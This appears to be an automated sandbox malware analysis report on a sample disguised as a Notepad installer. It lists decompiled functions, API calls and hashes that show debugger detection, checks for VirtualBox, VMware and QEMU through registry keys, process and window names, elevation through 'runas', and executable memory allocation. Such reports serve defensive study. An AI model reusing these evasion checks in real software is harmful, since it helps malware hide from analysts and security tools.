                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006EA28C
                                      • IsDebuggerPresent.KERNEL32 ref: 006EA296
                                      • GetWriteWatch.KERNEL32(00000000,00000000,00001000,?,?,?), ref: 006EA2B4
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006EA2E9
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 006EA2EF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Free$Alloc$DebuggerPresentWatchWrite
                                      • String ID:
                                      • API String ID: 1675568409-0
                                      • Opcode ID: 4cfbc09e4d0f7669f14ced8bff5dd1c601a1208c25bf5f08d62444ce8754c254
                                      • Instruction ID: de631fe267067f869cd32c006630bdd5cd17bf02e890b7478c771947f18afacb
                                      • Opcode Fuzzy Hash: 4cfbc09e4d0f7669f14ced8bff5dd1c601a1208c25bf5f08d62444ce8754c254
                                      • Instruction Fuzzy Hash: A611E270A01364BFDB229BA59C45FAEBFB9EF04750F244065F201F2180C6706A00DF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E434F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.NTDLL ref: 006E4360
                                      • ShellExecuteExW.SHELL32(?), ref: 006E4399
                                      • CloseHandle.KERNEL32(?,?,?,00000000), ref: 006E43A8
                                      • GetLastError.KERNEL32(?,?,00000000), ref: 006E43B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseErrorExecuteHandleLastShellmemset
                                      • String ID: @$runas
                                      • API String ID: 3899250325-1829409388
                                      • Opcode ID: 2108b3741fc2b498ccb81ff5f8b5b6157d763ed6b2da3de0a66d80f31f40cd0c
                                      • Instruction ID: 3660aa0414beaa09e87fe2261651e45adbd8c94638a334084448506efc038010
                                      • Opcode Fuzzy Hash: 2108b3741fc2b498ccb81ff5f8b5b6157d763ed6b2da3de0a66d80f31f40cd0c
                                      • Instruction Fuzzy Hash: BA015676D01229ABCB10AFAAE819BDEBBBAAF44724F004015F904E7254DB709900CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E9C88 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemInfo.KERNEL32(?), ref: 006E9CA3
                                      • GetModuleHandleExW.KERNEL32(00000004,006E9C88,?), ref: 006E9CBA
                                      • GetCurrentProcess.KERNEL32(?,?,0000000C), ref: 006E9CD1
                                      • GetModuleInformation.PSAPI(00000000), ref: 006E9CD8
                                      • VirtualQuery.KERNEL32(?,00000000,0000001C,00000000), ref: 006E9CF7
                                      • VirtualQuery.KERNEL32(00000000,00000000,0000001C,00000000), ref: 006E9D6E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ModuleQueryVirtual$CurrentHandleInfoInformationProcessSystem
                                      • String ID:
                                      • API String ID: 2307031642-0
                                      • Opcode ID: 8e72614688483fc19af735dbb0347378fd3d1c8fc9f887407336084860547a47
                                      • Instruction ID: a9f6bbc88149fe8ee2e65b09c6b1dcf3c66355ecd83ad5a9b04c805fcf031df9
                                      • Opcode Fuzzy Hash: 8e72614688483fc19af735dbb0347378fd3d1c8fc9f887407336084860547a47
                                      • Instruction Fuzzy Hash: 6F31B372B11A699BEF249AEACCA5BFE73E7EF44300F540425E502E63C5D6785C80C760
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E9201 Relevance: 9.1, APIs: 6, Instructions: 53processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006E9224
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 006E923E
                                      • Process32NextW.KERNEL32(00000000,?), ref: 006E9261
                                      • StrCmpIW.SHLWAPI(?,006F5DD8,00000002,006F5DD8), ref: 006E9274
                                      • CloseHandle.KERNEL32(00000000), ref: 006E927B
                                      • CloseHandle.KERNEL32(00000000,00000002,006F5DD8), ref: 006E928A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 1789362936-0
                                      • Opcode ID: e6756140c3adfd2404da5d811585ef14a627fd0104a850ed6781f1d704d66669
                                      • Instruction ID: 9bd5468003623a0b101d75335f782bb3b35611b161b65967d2bd88b1af5a3fe2
                                      • Opcode Fuzzy Hash: e6756140c3adfd2404da5d811585ef14a627fd0104a850ed6781f1d704d66669
                                      • Instruction Fuzzy Hash: 4E01C4395012297EDF20A6659C48BFE3BBE9F49354F100195EE05E2291E6308E458EB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E9769 Relevance: 7.6, APIs: 5, Instructions: 64memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemInfo.KERNEL32(?), ref: 006E97A5
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 006E97B6
                                      • memset.NTDLL ref: 006E97CD
                                      • VirtualProtect.KERNEL32(00000000,?,00000140,?), ref: 006E97E2
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 006E97FC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFreeInfoProtectSystemmemset
                                      • String ID:
                                      • API String ID: 48612997-0
                                      • Opcode ID: 22f0af5bd1907028aabeac7662f3d7097ebf987011f9c082e6dc29b8c88f3dba
                                      • Instruction ID: 9d2e648f5824f24cfa6433f5cc9809884e7a0395c8cf5a3017bb2fc3bdb1036a
                                      • Opcode Fuzzy Hash: 22f0af5bd1907028aabeac7662f3d7097ebf987011f9c082e6dc29b8c88f3dba
                                      • Instruction Fuzzy Hash: 51119072A41759ABDB118FA99C46FDEBB79BF04710F100529F601A22D0C7745942CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EC386 Relevance: 7.5, Strings: 6, Instructions: 35COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: 8Uo$HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0$HARDWARE\Description\System$Identifier$QEMU$SystemBiosVersion
                                      • API String ID: 3677997916-2078111225
                                      • Opcode ID: f2e8c83f5dd1ad005fe7a5aaaf647861c9670bfd4334796b186b9f40e09000ac
                                      • Instruction ID: a20985764e45d30f5afd9e198c2168ce52d00d623eaa429ac9cf9347de84ac5d
                                      • Opcode Fuzzy Hash: f2e8c83f5dd1ad005fe7a5aaaf647861c9670bfd4334796b186b9f40e09000ac
                                      • Instruction Fuzzy Hash: 02F0B472901708ABDB019F8E8D459EFFFBAEB00314F50442ADB15B6200E3B09E05CBD0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EBF95 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006E911C: malloc.MSVCRT ref: 006E9132
                                        • Part of subcall function 006E911C: memset.NTDLL ref: 006E9143
                                        • Part of subcall function 006E911C: GetSystemFirmwareTable.KERNEL32(?,?,00000000,00001000), ref: 006E9153
                                        • Part of subcall function 006E911C: ??3@YAXPAX@Z.MSVCRT ref: 006E9197
                                        • Part of subcall function 006E91CA: memcmp.NTDLL ref: 006E91E5
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EC001
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@$FirmwareSystemTablemallocmemcmpmemset
                                      • String ID: VBOX$VirtualBox$vbox
                                      • API String ID: 387942524-1078916713
                                      • Opcode ID: a5d8f5b71d4d2fb22b948768502f349e02e664b8f3221a672229f6de0d5e481c
                                      • Instruction ID: 77621e35eef380c6a1dd4a5f626134c30f393145b3c26552f38baed96ac142a0
                                      • Opcode Fuzzy Hash: a5d8f5b71d4d2fb22b948768502f349e02e664b8f3221a672229f6de0d5e481c
                                      • Instruction Fuzzy Hash: 3AF07832A02359B6EB3522478D0BFEF3A6FCF92760F100120FB04A5280FA728E00D1B5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E9BAA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006E9BE8: VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000001), ref: 006E9C4B
                                        • Part of subcall function 006E9BE8: VerSetConditionMask.NTDLL(00000000), ref: 006E9C4F
                                        • Part of subcall function 006E9BE8: VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 006E9C78
                                      • SetLastError.KERNEL32(0000029A), ref: 006E9BC5
                                      • OutputDebugStringW.KERNEL32(random), ref: 006E9BD0
                                      • GetLastError.KERNEL32 ref: 006E9BD6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConditionErrorLastMask$DebugInfoOutputStringVerifyVersion
                                      • String ID: random
                                      • API String ID: 1197728218-373021397
                                      • Opcode ID: bb3c12c79b13f88e9298c3f547ada4d26c99e44a441a5e442e9d899552cdf10e
                                      • Instruction ID: 35f48e1185840be64538d9b64fc1106e07f2310b9c21ee7ed03dccac557170a0
                                      • Opcode Fuzzy Hash: bb3c12c79b13f88e9298c3f547ada4d26c99e44a441a5e442e9d899552cdf10e
                                      • Instruction Fuzzy Hash: 5DE0CD3234531613D71027577C49FFB3B5F9F41B62F050016F608D4190C9804841C5B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EB6B1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindWindowW.USER32(VBoxTrayToolWndClass,00000000), ref: 006EB6C0
                                      • FindWindowW.USER32(00000000,VBoxTrayToolWnd), ref: 006EB6CB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FindWindow
                                      • String ID: VBoxTrayToolWnd$VBoxTrayToolWndClass
                                      • API String ID: 134000473-1325860762
                                      • Opcode ID: 752db8f584e782c582f798e3030e46161d29f0999919a1f860e985d16df815d2
                                      • Instruction ID: 643dcf997c15a8aff1b4b3923c1b8e5cf533775b401ea372cc76a0ca375cf857
                                      • Opcode Fuzzy Hash: 752db8f584e782c582f798e3030e46161d29f0999919a1f860e985d16df815d2
                                      • Instruction Fuzzy Hash: B5D0C72778335562DA3131566C1AF9B0A679FD4BE1F511456F700D72D0D6905C0199A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EC1AC Relevance: 6.3, Strings: 5, Instructions: 30COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                      • String ID: VGAuthService.exe$vmacthlp.exe$vmtoolsd.exe$vmwaretray.exe$vmwareuser.exe
                                      • API String ID: 1083639309-300419568
                                      • Opcode ID: ff0610795d247e5bc6799d496a97fe725afe16003f8fd652fe60b66451d3366e
                                      • Instruction ID: 6be3c6ba3a4d0b1519ea56be3c9ea53a33d745b813bbfed08cd89c9be9675636
                                      • Opcode Fuzzy Hash: ff0610795d247e5bc6799d496a97fe725afe16003f8fd652fe60b66451d3366e
                                      • Instruction Fuzzy Hash: 5DE03072901248AADF10DF8AD8494EFBFB6EB40368B111069E615A6202D7B15A09CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E9963 Relevance: 6.0, APIs: 4, Instructions: 43nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 006E997D
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 006E9980
                                      • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 006E99A6
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 006E99A9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentInformationQuery
                                      • String ID:
                                      • API String ID: 3953534283-0
                                      • Opcode ID: cf812fceb9799acf50de0112a3141755bd3a4dcfae942422fd71969b97a90d16
                                      • Instruction ID: 3dfc912f0e0bc7b15da4ccf7571d315d6851d338496b44ec4f896d993c553bf0
                                      • Opcode Fuzzy Hash: cf812fceb9799acf50de0112a3141755bd3a4dcfae942422fd71969b97a90d16
                                      • Instruction Fuzzy Hash: 86F08172601258FBEB20C691DC09BEE776EDB80765F28506AA601E2180D6B49BC4D671
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EC4B1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006E911C: malloc.MSVCRT ref: 006E9132
                                        • Part of subcall function 006E911C: memset.NTDLL ref: 006E9143
                                        • Part of subcall function 006E911C: GetSystemFirmwareTable.KERNEL32(?,?,00000000,00001000), ref: 006E9153
                                        • Part of subcall function 006E911C: ??3@YAXPAX@Z.MSVCRT ref: 006E9197
                                        • Part of subcall function 006E91CA: memcmp.NTDLL ref: 006E91E5
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EC506
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@$FirmwareSystemTablemallocmemcmpmemset
                                      • String ID: QEMU$qemu
                                      • API String ID: 387942524-3256932160
                                      • Opcode ID: 587adf202cdad98d0d6d4ce52210811320dd02699e004dab625c4604b2663f5f
                                      • Instruction ID: fb3de011e39532b391e38732ca182f25133865b441767a798e7c28de70ded1f8
                                      • Opcode Fuzzy Hash: 587adf202cdad98d0d6d4ce52210811320dd02699e004dab625c4604b2663f5f
                                      • Instruction Fuzzy Hash: 94F0B472A0125476DB25225B9C0BEEF7AAACFC2764F050064FB04E6240F5615F1181B5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E99F7 Relevance: 4.6, APIs: 3, Instructions: 53nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _alloca_probe.NTDLL ref: 006E99FF
                                      • NtCreateDebugObject.NTDLL(?,001F000F,?), ref: 006E9A44
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 006E9A6D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateDebugHandleObject_alloca_probe
                                      • String ID:
                                      • API String ID: 3623914428-0
                                      • Opcode ID: 3bbe82a31ec90bd4e4b666e1d42e566006d316595cded1855240f90a431f91f8
                                      • Instruction ID: 63f81f424d06e9ae8880f6528fb40985f278ce852df292fb5cafe3f05a8b1ffe
                                      • Opcode Fuzzy Hash: 3bbe82a31ec90bd4e4b666e1d42e566006d316595cded1855240f90a431f91f8
                                      • Instruction Fuzzy Hash: 17115E71901298BFDB21DFA9CC859EEBBB9BB48300F5004B9E505E2240D6745B849EA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EA63E Relevance: 4.5, APIs: 3, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@NameUsermalloc
                                      • String ID:
                                      • API String ID: 2732050888-0
                                      • Opcode ID: 128752b477bff3fec0ce85bfa24de5bac92fc155de545e00243f0167075e5466
                                      • Instruction ID: 947b3ea5ccf2410cc6c4fccbf8b6654596c59bf23bc641e475a3903055c2da17
                                      • Opcode Fuzzy Hash: 128752b477bff3fec0ce85bfa24de5bac92fc155de545e00243f0167075e5466
                                      • Instruction Fuzzy Hash: 23E02672612222BBCB008FA5AC088EF779EDB067903044025F801D3280EB24DE00CAF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E9FB0 Relevance: 4.5, APIs: 3, Instructions: 18COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(006E9FDC), ref: 006E9FBD
                                      • RaiseException.KERNEL32(C000008E,00000000,00000000,00000000), ref: 006E9FCB
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006E9FD2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Exception$FilterUnhandled$Raise
                                      • String ID:
                                      • API String ID: 1301862105-0
                                      • Opcode ID: b75df30bbbabda63bea75545147b3454e9d49719b309c067504a5705cab5d8c1
                                      • Instruction ID: 4d60ecb433d994ab6b4e86fa8cce33df6f36d9a2af154787935abb59e6319f90
                                      • Opcode Fuzzy Hash: b75df30bbbabda63bea75545147b3454e9d49719b309c067504a5705cab5d8c1
                                      • Instruction Fuzzy Hash: 2CD0C9726200607FA74097B9BC04CBB26AEEB896213075056F900D3210CEA05C42CFB1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EC3E5 Relevance: 3.8, Strings: 3, Instructions: 28COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                      • String ID: qemu-ga.exe$vdagent.exe$vdservice.exe
                                      • API String ID: 1083639309-986563468
                                      • Opcode ID: 234737a64928141e8f093a9de34faa1e8181faffe8cb2787889eb438a675a497
                                      • Instruction ID: 3590a5ffa107295be5a3366aba5f4cf0a171bfddeb4e15222224d8e5e6b909af
                                      • Opcode Fuzzy Hash: 234737a64928141e8f093a9de34faa1e8181faffe8cb2787889eb438a675a497
                                      • Instruction Fuzzy Hash: ABE0D836A41348AADB119F9ED8554DFFFF9EB403A4F104079EA4062241E3719E0A86A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006ECA74 Relevance: 3.6, Strings: 1, Instructions: 2366COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: {8n
                                      • API String ID: 0-443592199
                                      • Opcode ID: f924ea5a8f57c9fa86eff03538587d60ac39baea2dff29d6d3356230a84d21ee
                                      • Instruction ID: 3fda2ad0f9aadbdb39192c43b7a5fb06a130e432a8613e87cbfa32b1d3b25da1
                                      • Opcode Fuzzy Hash: f924ea5a8f57c9fa86eff03538587d60ac39baea2dff29d6d3356230a84d21ee
                                      • Instruction Fuzzy Hash: 9B23CA76D002289FDB14CF9AC8C54DDFBB2BF8C354B5A8299DD197B341C6B06A12CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004041D0 Relevance: 3.2, APIs: 2, Instructions: 183COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 70%
                                      			E004041D0(intOrPtr* _a4, signed long long* _a8) {
				unsigned int _v32;
				signed int _v36;
				unsigned int _v40;
				signed long long _v44;
				signed int _v48;
				signed long long _v52;
				signed int _v56;
				signed long long _v60;
				intOrPtr* _t78;
				intOrPtr* _t106;
				signed int _t107;
				signed int _t113;
				signed long long _t120;
				signed int _t122;
				unsigned int _t129;
				unsigned int _t131;
				unsigned int _t133;
				unsigned int _t137;
				signed int _t140;
				unsigned int _t141;
				signed int _t143;
				unsigned int _t154;
				signed long long* _t155;
				unsigned int _t157;
				signed long long _t168;
				signed long long _t172;

				_t155 =  &_v60;
				_t78 = _a4;
				if( *_t78 != 0) {
					 *_t78 = 0;
					return _a8;
				} else {
					_t120 =  *0x424fb0; // 0x5497fdb5
					_t107 =  *0x424fb4; // 0x106689d4
					_t143 =  *0x424fa8; // 0xb
					_t154 =  *0x424fac; // 0x0
					_v60 = _t120;
					_v56 = _t107;
					while(1) {
						L4:
						_t129 = _v56;
						_v40 = (_t154 << 0x00000020 | _t143) << 0x17 ^ _t154;
						_v44 = _t143 << 0x00000017 ^ _t143;
						_t131 = _v40;
						_t122 = _v60;
						_t143 = _v60 ^ (_t129 << 0x00000020 | _v60) >> 0x1a ^ _v44 ^ (_t131 << 0x00000020 | _v44) >> 0x11;
						_t113 = _v56;
						_t154 = _v56 ^ _t129 >> 0x0000001a ^ _t131 ^ _t131 >> 0x00000011;
						_t133 = _t113;
						asm("adc edx, esi");
						_v60 = (_t133 << 0x00000020 | _t122 + _t143) >> 0xb;
						_v56 = _t133 >> 0xb;
						asm("fild qword [esp+0x10]");
						_v60 = _t122;
						_v56 = _t113;
						asm("fxch st0, st1");
						_v52 = _v60 ^ _t122 << 0x00000017;
						_v48 = _v56 ^ (_t113 << 0x00000020 | _t122) << 0x17;
						_t137 = _v48;
						asm("fld1");
						_v60 = _v52 ^ (_t137 << 0x00000020 | _v52) >> 0x11 ^ _t143 ^ (_t154 << 0x00000020 | _t143) >> 0x1a;
						_v56 = _v48 ^ _t137 >> 0x00000011 ^ _t154 ^ _t154 >> 0x0000001a;
						_t140 = _v56;
						asm("adc edx, ebp");
						_t141 = _t140 >> 0xb;
						_t157 = _t141;
						_v36 = (_t140 << 0x00000020 | _v60 + _t143) >> 0xb;
						_v32 = _t141;
						asm("fild qword [esp+0x28]");
						asm("fmulp st3, st0");
						asm("fxch st0, st2");
						_t168 = st1 * st2;
						asm("faddp st1, st0");
						asm("fcomi st0, st3");
						st3 = _t168;
						if(_t157 >= 0) {
							break;
						}
						asm("fldz");
						asm("fxch st0, st3");
						asm("fucomi st0, st3");
						st3 = _t168;
						if(_t157 == 0) {
							if(_t157 == 0) {
								st0 = _t168;
								st0 = _t168;
								st0 = _t168;
								continue;
							} else {
							}
						}
						_v44 = _t168;
						_v52 = _t168;
						asm("fst qword [esp]");
						_v60 = _t168;
						 *0x424fa8 = _t143;
						 *0x424fac = _t154;
						 *0x424fb0 = _v60;
						 *0x424fb4 = _v56;
						L0040A320();
						asm("fdivp st1, st0");
						asm("fldz");
						asm("fucomip st0, st1");
						_t172 = _v44;
						if(_t157 > 0) {
							_v52 = _t172;
							_v60 = _t172;
							 *_t155 = _t172;
							L0040A2E0();
							_t172 = _v52;
							asm("fxch st0, st2");
						} else {
							asm("fxch st0, st2");
							asm("fsqrt");
						}
						asm("fxch st0, st1");
						 *_a8 = _t172 * st0;
						_t106 = _a4;
						asm("fmulp st1, st0");
						 *_t106 = 1;
						return _t106;
						goto L13;
					}
					st0 = _t168;
					st0 = _t168;
					st0 = _t168;
					goto L4;
				}
				L13:
			}





























                                      0x004041d4
                                      0x004041d7
                                      0x004041df
                                      0x004043d0
                                      0x004043e3
                                      0x004041e5
                                      0x004041e5
                                      0x004041eb
                                      0x004041f1
                                      0x004041f7
                                      0x004041fd
                                      0x00404201
                                      0x00404226
                                      0x00404226
                                      0x00404239
                                      0x00404241
                                      0x00404249
                                      0x0040425c
                                      0x00404262
                                      0x0040427b
                                      0x0040427d
                                      0x00404285
                                      0x00404287
                                      0x00404289
                                      0x00404292
                                      0x00404298
                                      0x0040429e
                                      0x004042a5
                                      0x004042b3
                                      0x004042c3
                                      0x004042c5
                                      0x004042cb
                                      0x004042d3
                                      0x004042e9
                                      0x00404309
                                      0x00404311
                                      0x00404315
                                      0x0040431b
                                      0x00404321
                                      0x00404321
                                      0x00404324
                                      0x00404328
                                      0x0040432c
                                      0x00404330
                                      0x00404332
                                      0x0040433e
                                      0x00404340
                                      0x00404342
                                      0x00404344
                                      0x00404346
                                      0x00000000
                                      0x00000000
                                      0x0040434c
                                      0x0040434e
                                      0x00404350
                                      0x00404352
                                      0x00404354
                                      0x00404356
                                      0x00404220
                                      0x00404222
                                      0x00404224
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404356
                                      0x00404360
                                      0x0040436c
                                      0x00404370
                                      0x00404373
                                      0x00404377
                                      0x0040437d
                                      0x00404383
                                      0x00404389
                                      0x0040438f
                                      0x0040439e
                                      0x004043a0
                                      0x004043a2
                                      0x004043a8
                                      0x004043ac
                                      0x004043e4
                                      0x004043e8
                                      0x004043ec
                                      0x004043ef
                                      0x004043f8
                                      0x004043fc
                                      0x004043ae
                                      0x004043ae
                                      0x004043b0
                                      0x004043b0
                                      0x004043b4
                                      0x004043ba
                                      0x004043bc
                                      0x004043c0
                                      0x004043c2
                                      0x004043cf
                                      0x00000000
                                      0x004043cf
                                      0x00404210
                                      0x00404212
                                      0x00404214
                                      0x00000000
                                      0x00404214
                                      0x00000000

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
